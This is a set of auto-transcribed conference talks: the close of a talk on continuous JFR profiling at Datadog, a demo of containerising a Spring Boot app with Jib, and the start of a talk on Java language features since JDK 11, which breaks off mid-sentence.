view. Yeah. Okay, so that's enough for demo. Okay, so lessons learned. One thing to note is that all of these observations are from running JFR at a scale that is ridiculous with all kinds of loads, all kinds of applications from the thousands and thousands of threads to effectively single threaded to high allocation rate ones to basically pretty much most of the way. There are all kinds of applications represented here. So for you with your kind of services, these might be edge cases that you would never run into. So that's worth noting. Also, at data dog, we really wanted to be able to support the use case with continuing continuous capturing all of this data. So there is a couple of different reasons for this. One is, of course, it's really nice to always have actionable data when something goes bad and having it ready available. And also, it's great to be able to break down data. If you have all the data available, you can provide context for the data and you can break it down in whatever buckets you want to, which is of course, of course, very nice, especially for for distributed tracing. And you also capture a continuous stream for data and analysis and statistics. So you don't need to remember to engage data capturing just because you did a new version of the pro product of the service or or happened to be Black Friday. And you wish you had the sense to to to enable the profiler. So there are multiple good reasons for wanting to capture all the profiling information. And the question then is, is that even economically feasible? What would the data rate be? What would the actual performance overhead be? So the cool thing is, it actually works surprisingly well at a pretty incredible scale. We're in taking terabytes of JFR data every minute at Datadog, and we're in taking the data from every Java process that is running the profiler. And the record corded data size is about five megs per minute to megs compressed. That corresponds to approximately around 100,000 events. And normally we collect one chunk per minute. And the CPU overhead is usually less than two percent. And the cost for continuously repeating the metadata is about half a percent. So the price we're paying for being able to provide the data to be able to parse whatever data is recorded in the flight recorder at any given time is pretty low. It also allows us to, you know, we don't need any state. We'll always have the data available to parse any kind of recording. It's pretty nice. So regarding the compressing of recordings, a colleague of mine, Jerozlop Bashrik, figured out for us, which the best compression algorithm would be, and we weren't just interested in being able to compress them a lot. Quite contrary, we really wanted to go for something which spent the least amount of CPU cycles over at the client, but still providing a decent compression ratio. And for us, that turns out to be outside four with the default settings. So the recording size here is just small. It's a 1.5 megabyte recording. Large is 5 megabyte recording. And the throughput is not normalized. It's in recordings per second. And the compression ratio is, of course, how much smaller recording became. And for us, it really is LZ4. That does the least damage over at the client. It's fairly efficient. Okay. So exception profiling, starting with exception profiling. So the built-in GFR exception profiler can be configured to capture all exceptions or just errors. And we thought, no, errors, how many can there be? So why don't we just enable the exception profiler for errors? Well, according to the Java language specification, error is the superclass of all the exceptions from which ordinary programs are not ordinarily expected to recover. So you would be excused for thinking that there shouldn't be that many errors thrown in application. Well, that's not quite true. So one of the most popular and widely used Java libraries used quite a lot internally at Adalog as well. Through an enormous amount of errors, there was a subclass named lookahead success. It was used for control flow in a parser. So, you know, outside the ivory tower, not every program might be, you know, in compliance with the Java language specification. But the exception profiling was actually great. It was great to be able to capture both, you know, uncaught exceptions and uncaught exceptions and see how much was actually being thrown and optimized so that there were less of them thrown because many of them were thrown where they wouldn't need to. So we went ahead and invented our own new exception profiler. So the new exception profiler has two different kinds of events. One is getting exceptions per type. So we meet them at chunk rotation. So on new chunk, well, we get an event for each of the exception types and get a count for them. And we sample the first thrown exception of each type. And then we try to sub-sample to hit a certain target rate. So we're using inspiration from PID controllers to try to get these events evenly spread across time. We'll talk about this a little bit later when we do the allocation profiler because we later built a new allocation profiler for JFR and we were inspired by the work that was done for the exception profiler. Okay, so a little bit later is now. Allocation profiling was introduced in JFR quite some time ago in 7.40 when it was still Java flight recorder. And to not have too severe performance implications and to not emit too many events, it uses two paths through the allocation profiler that isn't hit all the time. One of them is when a new thread locale buffer is retired. And the other one is when we need to directly allocate something outside of the T-Lab, for example, when we directly allocate some big object on heap. And normally this has a really good performance, runtime performance and data production rate. But these days, though, you have these 96 plus core beasts that are allocating like crazy on every core. And you might run into edge cases where you simply get too much data. Actually, first of all, we had a performance problem. So there was a hash code bug regarding the JFR constant pools that we ran into, which caused us to use way more CPU than necessary when working with stacks. So once that was fixed, the CPU overhead of using this wasn't too bad, but we still produced way more data than we could handle. So we needed to have a means of better controlling the data production rate. And the solution to that was to use the PID controller inspiration here as well. So we added a new allocation profile to JFR and JDK 16 and above. So first, we got inspired by the JVMTI riff off of JFR. So in JDK 11, JVMTI got an allocation sampler that uses the same code paths as the JFR T-level events. But it doesn't take each and every one of them. You can specify the average amount of memory allocated between the samples that you get. So that's a really nice thing to do. But eventually you probably want to get them to be emitted at the concentrate. So again, we used inspiration from PID controllers to try to control the data production rate. That gives us some really nice qualities. We have a controllable data budget for our samples. They get spread out nicely over time. We get actual individual samples with what kind of thing we try to allocate, the size of the thing we were trying to allocate, the time and thread it was allocated in. But we also have the amount of data allocated since the last sample. So we can still use that information for waiting, for getting the total allocation pressure and get a nice view of that. So as I said before, if you can provide context, and since we're still getting hundreds of events per second, even with this approach, we can break down things, even allocation rates, if we wanted to, per, let's say, distributed trace. In this case, we're actually not breaking it down per trace because if you do get a garbage collection and you're spending a lot of garbage collection time in your actual span in your distributed trace, you probably want to know where that garbage was created no matter which thread created it. So here we actually don't break it down. So this is a really stupid example. Anyways, I'm getting tired. Let's go over to CPU profiling. So CPU profiling, we have execution sample events. And they are really nice in the sense that they are extremely cheap, both in memory and overhead. So we have a pretty much constant overhead. We don't sample each thread. We're sampling a few of them every time, a constant amount. And they are not safe point biased. So we don't require a safe point every time we try to sample something like you would need to if you use the Java APIs that are available for getting thread stack dumps. So that's all very good. There are a few cons though. One of them is we're not sampling every single thread. So for example, JVM native threads, native library threads, they will not be sampled. So you won't get a perfect mapping to the CPU time. And even though we might be able to compensate some of that unaccounted CPU time using other events, it's not perfect. And we don't get native stacks. So we think that JVM would do quite well with a proper CPU profiler that takes a sample when a certain CPU time has elapsed no matter which thread. And there are some really nice APIs today, for example, Proven to Open on Linux that are backed by PNU. So hardware if you're not running in a container. So not sure how often that would happen, realistically speaking today. But we think it would be extremely useful to have something like that in JFR. So as was shown in the demo, JFR has events for thread holes of various kinds. And you get some contextual information as well. You don't just get the stack trace, you get the stack trace, you get wall clock timing for monitor enter, you get the monitor class and the monitor address. So you can see if there's more than one instance there. And for socket reads, you would be able to get the amount read, some number of bytes read, and the IP address you read from. So these are obviously very useful things, useful information to have when you're trying to track down a problem. But of course, these can happen too often. And JFR has one way to limit this output. Limit how many events are emitted. And the only way you can do that in JFR today is with the threshold. Now with JDK16 and our rate limiter, you could actually use that in more events. So hopefully we'll have that in the future. But this thresholding is problematic because you will always run into edge cases. For example, if you have an application that has 10,000 threads, and you have parks, and each park is like 11 milliseconds and your threshold is 10, that's probably an amount of events that you're not prepared to pay for. So even if it's not necessarily CPU overhead problem, it's definitely going to produce more data than you would want. And you also have a statistical skew. What if all your, you know, parks are at 9 milliseconds and your threshold is 10, you're not going to see them. So it's very hard to know if you actually missed something. So it would be nice if the flight recorder had a WALTLock profiler. It doesn't today. So you could use both of the best worlds. You could subsample and rate limit the events, you know, the PID thinking, you could also add a proper WALTLock profiler for JFR. And you might even make it so that customers and whoever would want to could build their own dynamic WALTLock profiler easily using JFR. So one way to do that would, for example, be to add a commit method on the event class that committed the event on a separate thread. So it would use the thread example, the stack trace, maybe even allow it to, with an extra annotation to get the thread state and record that. That would be a nice addition to the API. And then everybody could sample things however they want to. It could be separately the Java thread, just picking threads and sampling them. Okay, so the last thing I thought I'd bring up is the old object sample event. So for those of you who don't know the object sample event is a very interesting event for solving memory leaks without having to do full heap dumps. It's sampling instance allocations. You get the allocations stack trace, you get the allocation type and time and type. And you can also, when you dump the events, you can calculate the reference chains back to the objects. So you pretty much get everything on a silver platter that you might want to use for need for solving a memory leak. There are some problems though, because the allocation stack traces will survive for much longer than just a chunk. The constant needs to be stored somewhere where they can be stored for longer. And the current problem is twofold. One is the stack traces are always sampled. So whenever you might consider to sample an old object sample, you will capture the stack trace. And the second is constants that aren't used anymore will never be cleared. So these can grow very quickly and grow very large and they won't shrink. So you can't really use the old object samples events currently for continuous profiling until we've solved that problem. Luckily, there is a solution coming up. So reference counted site table will probably be committed over the next month or two. So then we can start using the old object sample for continuous profiling as well. Awesome! Okay, so I widely overestimated the amount of content that I would be able to cram into this presentation. So there will sadly be no nice demos of all the cool things we're doing at Data.org with this technology. But I'm going to provide some links to things and to a blog post that I did about continuous profiling and diagnostics so that you can go check it out. Or you can just try out the product and see all the good stuff that we do. So first thing that I thought I mentioned is that GMC8 will be released, at least source released by the time that this presentation is held. It's up to the downstream vendors to provide binary releases and that might take a bit of time. But you can at least build the build yourself or you can, you know, maybe, well, maybe it will be released with binary releases by then too. We'll see. Anyways, there is a tutorial that you can use to learn more about Flight Recorder and Wish Control. It's on GitHub. And feel free to fork and do pull requests for things that you want to improve on that tutorial. And there is also a nice JShell example for using GMC Core, so the parser and the statistical tools together with Flight Recordings and Flight Recorder events. And that is also on GitHub. So here are some interesting links that might be useful. One is the GitHub repo for OpenJDK.JMC. If you want to go to the JDK, it's of course OpenJDK.JDK. My blog where I sometimes write about things that are related to JFAR or serviceability or Wish Control. And the last link is to my fuji.io blog on continuous profiling. So I think I'm probably out of time now.
The JDK Flight Recorder (JFR) was open sourced with JDK 11, and was subsequently back-ported to JDK 8u262. JFR allows for always-on production time profiling, with little overhead and with a rich set of data. This talk will discuss things to consider when using JFR to profile hundreds of thousands of JVMs in mission critical systems all over the world. We will discuss trade-offs, limits, work-arounds and insights we’ve learnt as we’ve developed the Java profiling capabilities at Datadog.
10.5446/52803 (DOI)
you Hello everyone welcome to Forcedump 2021 my name is Asi Shawdri and today I will be talking about how you can containerize your Spring Boot application or Java application with help of Jib. So this presentation is going to be a mix of very few slides and then we will mostly will be doing a demo. So let's get started then. So this is going to be the agenda that we are going to cover today. So I will just pause here for a moment if you want to quickly you know go through the agenda and so I mean I have very few I mean very less slides I just wanted to make it you know very hands-on and interactive and less boring. So this is typical how what we are going to cover in this agenda in this presentation. So I will start with myself I am a software engineer and I work for a financial services company and I currently located in Pune India and I am at I also write blog about technology and mostly about the things that I you know work on or have some experience working experience or just out of curiosity I try you know any cool or trending things in technology and share my experience with others and I am a Java fan I like anything related to Java any framework or tool and I like DevOps and anything related to cloud and I am very active on social media platform also like Twitter and I mostly you know follow people who are passionate about technology and mostly discuss about technology and related stuff here also and I am a contributor to few of the open source project also and this is my GitHub username and you can you can also I forgot to mention my my Twitter handle I have also mentioned in there and I am I write blogs on Hatch node and I am also active on professional networking site like you know LinkedIn. Okay so enough about myself so what is Jib? Jib is a as I said earlier it's a you know it's you can call this as a modern day containerizer for Java developers it is this tool is basically developed and maintained by Google it's an open source project and it is very you know very it has got enough traction on GitHub and enough star and there are you know it's in this is open source and why this is why also like widely popular among the Java community itself and continuing about your application with Jib is very easy with Jib because you because Java developers typically use you know build tools like Maven and Gradle and Jib easily fits into that ecosystem and you just have to add a simple plug-in and for your Maven or Gradle build tool and you will be able to you know with very minimum configuration you will be able to containerize your Java application very quickly and Jib basically stands for Java image builder and the most important or the you know the important thing about Jib you need to know is that you don't have to you know you don't need a Docker daemon or although it has it has support for that also if you want to containerize your image but the default behavior is you know or the most popular way to containerize people the people mostly like Jib is because of the fact that you don't have to maintain you know writing landing Docker files or have a Docker CLI and then you know do Docker build and then Docker push so so as Java developer don't have to you know spend hours or you know weeks just to learn it new technology like Docker even though I am not against that technology but I am just saying it's a very quick and easy way to containerize your Java application and and I think we all should agree to the fact that not all Java developers are container expert and I mean it would be a very wrong expectation you know to set it that Java developers are also should know about containerize even though it would be a good skill set to have but but it will it so I personally would prefer to know anything you know related to new exciting or something cool technologies that are coming but it is a personal story that you want to learn a new technology you know to do your work late work related thing or something but most people generally who you know only care about writing code and don't you know want to learn an extra technology or because there is a what I'm trying to say there is a learning learning curve involved and and you have to it takes a while you know to get hang of it to like Docker or something even though there are very basic command but you know to get an overview to get an overview of a technology it takes time and and and if you are started your journey with Docker or you know already have Docker then you might have gone through the same pain learning a new technology it's a journey in itself and when you start building with Docker you will so when you know use a technology or tool the problem of the technology of tool also become the also become your problem I mean your application problem where you are using that technology or tool right so so Docker is again you know the standard way of building images till till today but there are many alternatives coming so Jeep is one of that you know cool alternative which is specially targeted towards Java developers and so you don't have to deal with complexities such as you know Docker file or you know Docker installation all those things so jibs abstract away all those complexities for you and you you can focus more on your you know writing code or adding features to your product etc etc so now coming back to our presentation so how you can containerize your application as I said you know it is very easy you it is as easy as adding a palm dot XML for your may one bit in your may one build tool and a plugin in your build dot gradle file for your you know gradle projects so this is how I mean typically in Java world right if you need to support for third party system or something you have a plugin for that so this is how jibs works you add the plugin and then you specify very you know some configuration related things with you know to get containerize your application with these options are also very minimal to get basic version of your application as you know as a containerized image so and then again this is your typical jib versus Docker build flow so I'm not trying to compare these two technologies my point is that jib has a very you know straightforward or very less complex or I will say I mean it has it is very easy to containerize your application with jib rather if you go with Docker so again Docker has already you know it's widespread into many enterprises and Docker is everywhere so you cannot escape from that but again I'm not against the technology but I'm just trying to highlight how your typical build with jib and Docker will look like so your jib build is straightforward you have a project you add the plugin and you get your containerized image pushed to a registry of your choice and then with Docker build flow you need to have a Docker CLI, Docker demon and then you know you need to create the jar and you need to write a Docker file so you have to build your jar then the Docker file will do its work you know you will provide the instruction to create damage for your application in there and then you will do a you know typical Docker commands like Docker build, Docker push and then you will push it to a containerized tree so we develop containerizing application with jib is very easy and now we will you know do a quick demo so I will head over to my browser so in this demo I already have downloaded a basic version of the project I have used spring initializer and it is I think most Java developers use this option just to get you know get up and running with spring boot application and this is the preferred option and I have used this and my application is simple spring boot application which you know expose simple hello and point and print some very basic hello message so I will head over to my ID now just to give a overview about application so this is my spring boot project and the thing to highlight here is that I don't have any Docker file over here and it is very easy to you know it's a very minimum setup so there is no Docker file involved here and now I will head over to the you know the main part so I have already added the plugin jib may 1 plugin I am just highlighting it and then you know I have specified the version also which version to be used and then you know these are some of the option that I have already added but I think I should remove this because we will add them later and then I have specified very basic in the so I will try to explain what's going on here in the configuration section so this is a very so this is how you give you an option to containerize your application you know you have you specify the from base image from is this how you which base image you will be using your application will be built on top of that and then the two ways it is the detail of your you know container container registry where you will be I mean the jib plugin will push the final image to and so this is the end so I am using a distruder Java 11 image and this at that it this part of the image digest part I have already added and so this so that it can use a specific you know image version otherwise it will go and try to you know do a try to connect to the the remote registry and try to you know find out which image digest to use so I will specify which image digest to use over here and so this is very basic again one thing to mention over here is that you don't need to specify the from part I mean the base image jib by default uses Java 8 distruder images but since I have set up for Java 11 and I wanted to provide you know give an overview that you can you have the option to choose a base image of your choice so I have used this option and even if you don't provide this option by default it takes Java so Java 8 is again this is said but it's still standard we have we are going to be moving to 6 I mean Java 16 and 17 but most of the tools and frameworks are still on you know defaults and Java it is still the default version so again that is another thing so coming back to my spring boot application my spring boot application is very basic I am just I have simple rest controller and one simple hello and point and this is very basic hello from jib message when this endpoint gets invoked so so and now I will just head over to my ID and you know try to create a containerized image of our application so let me just run so this this is how you containerize your application with jib again this option is specific to may one but for gradle this will be a different option but the end goal is same so jib column build and this will you should containerize our application and so I am just going to start the build now and wait for it to complete and meanwhile I will try to highlight the parts you know what is it trying to do and all those things okay so this part I need to highlight is the it is using the credentials so the plugin makes to authenticate with my container registry so this credentials are basically picked up from the main one settings file so I will head back to my browser just to explain this part meanwhile our build is still going on so the one thing that I think I forgot to mention is that when you containerize your application you need to provide this although this is not a secure way but this is just a demo so you need to in your setting.xml file you need to specify your registry URL and then username password that you are going to use for your you know repository and so this needs to be provided before you know you start building your application or run the build so I will now head back to my ID and so our build is still going on and another thing so we you know we could see some warning so it's 83% completed so initially it will take time because you know it tries to get the base image and all but subsequent builds are much faster so it takes around you know one minute 40 seconds and then second and so the build is completed and you see in since you can see the nice message over here that build and it is pushed the image to my you know Docker up container registry and so now I will go back to my browser and you know check the whether the image was pushed or not so I have already these many repository containers images available and the image name that we have used for our springboard application is we have mentioned in the palm dot XML file as I am just trying to highlight that part what was the image name so we have specified this so this is our you know this is going to be our image name so let's you know refresh the browser and see if our image was pushed or not so I will do a quick refresh so as you can see that our image is available here it was updated a minute ago and so it is showing its operating system you know it's what is used in inside the image and all those things so what we have done so I mean just trying to some repeat what you have done so far we have you know we have containerized our springboard application we had added the main one plugin and we selected the base image then we pushed the image to the container registry and we also I have also explained the authentication part that needs to be added for plugin to allow the plugin to you know authenticate with the container registry so now we will try to you know run this application and see if you are getting the expected output or not so I will head over to my terminal so I think let me I think there is some problem with my view so give me just one minute I will try to you know so what we will do now we will try to add a plugin and sorry we will try to run the image now so so that we can see the expected output that we the I mean the simple springboard the hello message that we are expecting from our application so I will run a simple run command so this will pull our image first and then you know run it so before going with that I let me just show you if there are any images so I don't have any image is available in my local you know local registry so I wanted to show you because that the G plugin has directly posted to the container registry and it has nothing to do with your local registry or you know it is not cached anywhere so now we will do is Docker run and run our application so it is not it is not able to find the image and now locally so it is trying to pull it from the Docker registry so I already have my Docker setup up and working so now it is it has started extracting the image layers and so let's just wait for this extraction to get completed and then once this you know extraction is completed it will try to run our application so the download looks like it's completed and it has started our springboard application and we will wait for it to you know get started properly so our springboard application is started now what I will do so what we have so these are the port exposed to my local host I mean in the container inside the container also and in my local host also so we can do a simple card you know 8080 slash hello sorry okay so we have got the expected output now this was this is what we have written from our you know the that the message that we have written so now what we'll do now I will do a quick change I will just add a simple you know exclamatory marks and change the message a little bit and we will again build our application and push it so earlier if you could see there was one warning coming that main class is not specified so this plugin was complaining about that so that is not an issue we can add the you know main class over here so in the container in the container you can specify you know many things so it gives you many option to you know tweak things or make things work according to your use case so I am just adding the main class so that warning goes even though that warning is you know it's not going to be a breaking change for us but just wanted to add that warning so what was the package name okay so it is in the spring inside spring not spring boot so I have then okay so I have added the main class so that warning also should now go away so now you know I will sorry so now I will try to run the build again and we will run the same option that we have used earlier, jib column build so this time it should not take you know it should be done quickly since we have done changes in the our source code only one class we have changed so if you see one thing that I wanted to highlight over here is that if you see this part right so this is how your directory structure or you know image layering inside your container image will be so your layering is divided into three part your resources your properties file in your resources and then your compiled classes and then your library dependency required to run your application so I mean the important thing I am trying to you know highlight over here is that so if you do a change only in your class file that only that parts get pushed and the same thing is only going to be pulled because that it will not build the whole application you know again so it has a good it has a nice catching mechanism and so it which you know it makes it very fast so now again what we will do we will hand back to our terminal so now what I will do is you know I will run the application again so first I will stop this container and so now I will do a Docker pull so I just very lazy you know so I am just copying the command but okay so as I said and yet so only the rest of the layering there was no change done so it is saying already exist and only since this image was layer was changed affected only that part was pulled same is the thing when you build you push to a container you only push the chip part which was changed so that's what makes it you know very fast so now I will just simply you know run our application may I mean we will initialize run our Docker container again and we will see if we are getting the the change output or not so I was putting good application has started now we will again do the curl so okay so it's good we are getting the change message now and this is the expected behavior and one more thing you can actually if you want to visualize how the image layering is done you can take help of tool called as dive so dive you know allows you to sorry I think I need to mention the image ID here it allows you to give you a nice overview inside of your image right so you can you know I mean you can see the actual content of your content inside your image and it is a nice handy tool it also explains you about if there is any you know space issue or if you are wasting any space or not so as you can see right these things are related to your base image and the rest of this chip me even plugins are related to the layering that Jim has done so these are your you know apps lips is your all you can see on the right hand side in the green all your dependencies and then you have your classes sorry the resources at the bottom in the right and then you have your classes compile classes we have only two classes so that's what it is also again if you see on the image details action on the left hand side yeah you know there is no potential wasted space so which is good right total image size again it is 200 MB for a simple spring boot application but you have the option to use a different base image which you think you know will be can do the job for your application and the size is as per your expectation but what doc the chip plugin provides the default it uses a distro less image which is you know again it is slimmer than the normal you know the base images typically we use which Linux distribution images that we like alpine or something because they include you know package managers like shell or gives you an option to you know you can do do an SSH or install packages inside your container so that so Jim doesn't support that I mean you can use the image of your choice but by default it provides you images which are you know secure because it's just images are secure as they don't provide any package managers in within so there is less attack surface and you know you your application is much secure that way and they have these images distruth images have very less vulnerabilities with them so I actually wanted to cover more things but I think the time I'm running out of time so I will just you know head back to the slide section so our demo is completed and we can now do a quick Q&A if there is any feedback or questions you can discuss it further again thank you thank you Fuji and the team for giving me this opportunity you know to put forward my thought process on things on this topic so again thanks a lot to Fuji and folks at Fuji and first time thank you you you you you you you you you you you you you you you you you
Jib is a Java containerizer from Google that lets Java developers build containers using build tools like Maven and Gradle. Containerizing Java applications is not a trivial task and also there is a learning curve involved as you have to get yourself familiar with tool-specific commands etc. I can say from personal experience that not all Java developers are container experts. For example, first, you should have docker installed and then you have to maintain a Dockerfile. Then over a period of time, the image size grows and you start trying things like multi-stage builds to reduce your image size and have only required dependency for your application. A developer ideally should not be worrying about these things. With Jib, you don't deal with such complexities and you just have to add a plugin to your build tool Maven or Gradle and you are good to go. It takes care of your image building and pushing to the container registry.
10.5446/52804 (DOI)
Okay, well, welcome to this session, which is called Getting the Most from Modern Java. My name is Simon Ritter, and I am the deputy CTO of Azul Systems. Now the idea behind this presentation, as the title would really suggest, is how to understand the new things that have occurred in Java in terms of features. Because we only got 30 minutes for this session, I need to kind of restrict this a little bit. So what I've decided to do is to go through the new language features that have occurred since JDK 11. So JDK 11 was the last long-term support release, and obviously we've had a number of releases since then because we have JDK 15 currently and literally this month because we're now in February, we'll have JDK 16 being released as well. So we've had several releases since then and a number of new language features. So what I've decided to do is just focus purely on the language features. There are lots of other things that have gone into Java. There's a number of API changes, a few changes at the JVM level, but really from the Java language perspective, what we're going to talk about or all the great things which we've seen introduced in the last, well, nearly about two and a half years, isn't it? Yes. Okay, so let's start with JDK 12, very logically, because that was the next release after JDK 11. Now, one of the things that was introduced here was the idea of switch expressions, and this was quite significant, not just from the point of view of what it provided in the language, but this is the first what's called preview feature in OpenJDK. And the idea behind a preview feature is to enable a new feature to be added to Java, but not making it part of the standard straightaway. The reason for that is that by doing it that way, people can have a chance to experiment with a feature, they can try it out, they can keep the tires on it, and then if they think that there's something that does need to be changed and they're not quite happy with it, feedback can be provided, and then the developers can review that and decide if they want to make some changes. And as we'll see, that seems to be working very well. So preview feature, it's kind of like the incubator modules that were introduced a while ago for new API features, and again, so you could introduce things without making it part of the standard. So switch expression, first preview feature. The reason behind this was if you look at the switch statement, which we've had right from the very beginning in Java, there's a number of things which make the use of a switch statement a little bit more tricky and potentially error prone than would be really ideal. And so the syntax of the switch statement was inherited from the C language, because a lot of Java syntax is based on the C language. And that was great for C, because the way that the switch statement worked in C was designed around the idea of a language which is more of a systems programming language, operating systems, compilers, those sort of types of things. Because Java is much more of an application language, the way that the switch statement works isn't quite the, you know, it leads to some potential problems. So one of the things that we have is that every case statement needs to be separated. So you've got to have case A, case B, case C. Okay, well, it's not that big of an overhead, but it's just a little bit more clunky than we really want. Then the other thing is we've got to remember to put a break statement in each of our case blocks. And that one is a bit of a big one, because I know I've done this in the past. I'm sure most people have done it, who've used switch is you've forgotten somewhere to put a break in. And then because the syntax means that you can do that, what happens is that you will fall through into the next one. And then you do something you don't expect. And the application doesn't work the way you expect, which means you've got a bug. And then trying to find that can be quite difficult, because it's a little bit of a subtle one. So that's one of the problems. And then also the scope of local variables is not always intuitive when you use them within a case statement. So this was the rationale behind this. They wanted to improve this. And so if we look at how we typically use a switch statement, this is a very typical kind of example. What we're doing here is we're taking one variable, day, we're going to switch on that. And then we want to assign a value to another variable, number of letters, based on which day it is. It's a sort of like multiple if then else type of thing. And obviously that works very well, but we have a lot of code here. So we look at this, it's very verbose. We've got case Monday, case Friday, case Sunday. Then we have to assign number of letters equals six. And in the next block, we've got case Tuesday, number of letters equals seven. So again, there's a little bit of a problem here, because what we can see is that if we forget to assign number of letters, we again get a subtle bug that would be introduced and it's more difficult. So the idea behind switch expression is to simplify this a lot and make it much more robust in terms of eliminating potential errors. If we look at what we get in terms of the new syntax, straight away you can see that it's much more condensed. There's a lot less text that we need. And so what we can see here is the first thing, because it's now a switch expression, we can assign the return value to our variable number of letters. And we only need to do that once. So we eliminate that potential of error by saying take the result of the switch expression, assign it to number of letters and then do that once and that's it. Forget about it. Then we see that in terms of the case statements themselves, the engineers have obviously looked around and they've discovered this incredibly powerful feature, which is called a comma separated list. So now we don't have to have a separate case Monday, case Friday, case Sunday. We can have case Monday, comma Friday, comma Sunday. That on its own was well worth the effort to me. And what they've then done is to borrow some of the syntax from lambda expressions and use the arrow to indicate that the right hand side of the expression is the cases that we're interested in a match against. And then the right hand side is the value that we're going to return from the switch expression. And clearly there may be situations where the value is invalid, in which case we can also with the default there, you can see that we can throw a new illegal state exception. So we can still throw an exception if we need to either return a value or throw an exception. But again, nice and syntax, nice syntax, very condensed, much easier to see what's going on, much less error prone because again, we don't have those break statements. There's no chance of falling through. We always see what returning all good. Now what we can do, and I'm not sure I really recommend this is you can actually combine the old style switch statement syntax with the new style switch expression. So you could do something like this, we use switch day, case Monday, case Friday, case Sunday, and then we use break to indicate the value that's going to be returned. And so we have break six, break seven, break eight and so on. And okay, you know, I don't really like this syntax that much because again, it sort of introduces the possibility of less readability and potentially some little bit more error prone perhaps. The other thing with switch expression is going back to the idea of local variables. And what you couldn't do in the past with the switch statement was to reuse a variable within different cases. And so the scoping of those variables didn't work. Now with the switch expression, as we can see here, you can actually form more complex code and you can use a block of code with the braces and say var x equals compute from and then in case two, you can do var x equals negative compute from. And that will work now and you can reuse the variable x in both of those cases and there's no issue over the scoping of those and not being valid. So that's all good. Again, I wouldn't recommend this syntax because once we start getting into code blocks, what I would recommend is to extract that code out, put it into a separate method and then call the method from that case. But there you go. You can do it. Okay, so that was the big things in JDK 12. Now let's move on to JDK 13. Now the six months of development, what did we get there? Well really only one sort of change in terms of the language. And this was what we called text blocks. Again, this is a preview feature. So introduced without being part of the standard so people can provide feedback. Now the problem we've had in the past with Java is that we can clearly define strings. But how we define strings is not always as easy as we really want it to be, especially if you want to have multi-line strings. That's the kind of big bugbear that people have. And in the example here, obviously what we want to do is have some sort of HTML tags and lay it out with indentation and new lines and so on. If we wanted to do that in Java before, it would be very complicated. We'd have to concatenate things. We'd have to put escape characters in there, backslash n, backslash r, those types of things. And it just becomes more hard work. What we needed was the ability to define a string where we didn't need lots of escape characters. We could simply say, okay, here's the start of the string. Everything after that is the string I'm interested in, including new lines, including any escape characters, whatever, and then have something that terminates that string in a way that compiler can understand. And that's what a text block is. So now rather than using a single set of double quotes, we use three double quotes together. So you can see here we've got string web page equals three double quotes. And one of the important things about this is that you can't start the string directly after those three double quotes. So you have to start the string on the next line. And here we've obviously got some HTML tags indented nicely, all very good. And then we terminate it with another three double quotes. Now if you wanted to put three double quotes in your string, then obviously that's a situation where you do have to escape it. So then you'd have to use a backslash in front of at least the first of those three double quotes. You can use one, two, or three backslashes. Realistically, you're only going to use one, but you could use one, two, or three. The syntax will support that. Now if we look at the output from this, what we'll see is maybe not particularly what you might expect. So what we see here is we run the web page and we see the HTML tags indented the way that we want them to, because we're using two spaces here. We never use tabs. We use two spaces. But what we're doing is allowing the layout of our strings to be the way that we would like it to be from the point of view of readability. What we don't have to do is push it all over to the left-hand side so that we got it aligned with the left-hand margin. That would be a little bit difficult in terms of readability. What we really want to do is what we've got here, where we can line up the string underneath the start of that so it's clear what's going on and it follows the layout of the rest of the application code. So the way that works is through what's called incidental whitespace. And in the case of this example here, what's happening is any whitespace up until the start of the first character of the text on the left-hand side is treated as incidental whitespace and eliminated. And that way, what happens is that you can see the HTML and the closing HTML tag are left justified against the margin. And then we still get the right indentation in terms of two characters and then four spaces, sorry, two spaces and then four spaces to get the right indentation. So we're eliminating that incidental whitespace. Now what you can do is if you want to shift things over and add more whitespace in front of it, you can actually shift your tags over and make it slightly further over to the left. And that will all right to the right and that will introduce more whitespace. So different ways of doing that. Switch expression. Ah, hang on. I just talked about switch expression. That was in JDK 12. So why am I talking about switch expression in JDK 13 again? And the answer is that there was feedback on this particular feature and the developer said, that's good feedback. We will make a change based on that. When I showed you the combination of the switch statement syntax along with the switch expression syntax, what we were doing there is we were saying case Monday, Friday, Sunday, break with a value of six. Now that will work because the break statement can be used on its own in a case statement or it can be used with a label. You can break out of a loop or a case statement to a label that's been defined elsewhere in the code. Bit like a go to. Must be I've never used that particular, well, maybe I have. No, I don't think I have. But anyway, I digress. So people said, well, yes, you can do it, but it's a bit confusing in terms of the syntax because you can never start a label with a number. So yes, the compiler knows that in this case it's returning a value. But it was still a little bit confusing to people and they said, don't really like that. So the developer said, okay, we'll make a change and rather than using break, we'll use yield. So now you do case Monday, case Friday, case Sunday, yield six, and that gives you the answer you want and all is good. So it's a feedback from developers and they've said, yeah, we'd like it to be a little bit different. And the developers said, okay, we'll take that feedback on board and make a change. JDK 14. Now JDK 14 introduced a couple of things. And I've got to say that probably in terms of the most recent releases, this is probably the big one with new features. So the first of those is around the way that we use simple data classes in Java. And if we look at the existing kind of code that we might write now, we would do something like this. So we're creating a class called point and effectively it's a two pool with two values X and Y. And in order to do that, we've obviously got to declare two instance variables, private final double X, double Y, then we have a constructor that takes two doubles. We then assign those doubles to the instance variables of the class. Then we've got access and methods so we can do public double X, which returns X, public double Y, which returns Y. And if you look at that, you've got, what is it? Something like 16 lines of code, maybe not with a white space, but probably good 12 lines of code just to create a two pool. And that's a lot of work when it's something as fundamental as this. So what JDK 14, I don't remember that JDK 14 introduces is the idea of records. This is, I like this. This is a really powerful thing and makes life a whole lot easier. So now what we can do is we can say, let's create a new class, but in this case, it's a record class and it's a new type of class within Java. There are some subtleties about this, which I'll go through in a moment. But essentially we're creating a class, which is a record and it's going to be called point. Now what we can do here is we can simply say point and then use the brackets to indicate the values that we want this record to encapsulate. So we've got double X and double Y. Then we simply have a set of empty braces and the compiler will generate all of the necessary code that is required for that two pool without us having to do any of it manually. So we get the same effective code as we had on the previous slide. So we get a constructor, we can pass values to it to, when we instantiate an object, we can access those variables through X and Y. Everything will work in exactly the same way. Now there are situations where not having a constructor may not be ideal because we might want to do some additional checking inside the constructor. In that case, we can use what's called a compact constructor. So here what we're doing is we're saying let's define a record called range, again, two values low and high. And what it's going to do now is have a compact constructor, which is called range. Now we don't have to have the brackets with the values specified for them, so we don't have to replicate the int low, int high there because we've already got those in the definition of the record. So that's one nice thing that limits a little bit of bloat. And then within that, we can define the body of the constructor and we can have an if statement if low greater than high, throw an illegal argument exception and okay, that all works the way that we want it to. So we've got more flexibility in terms of what we can do with records. Okay, few additional things about records because although records are like classes, there are some subtle things which we need to understand. So the first thing is that the compact constructor can only throw an unchecked 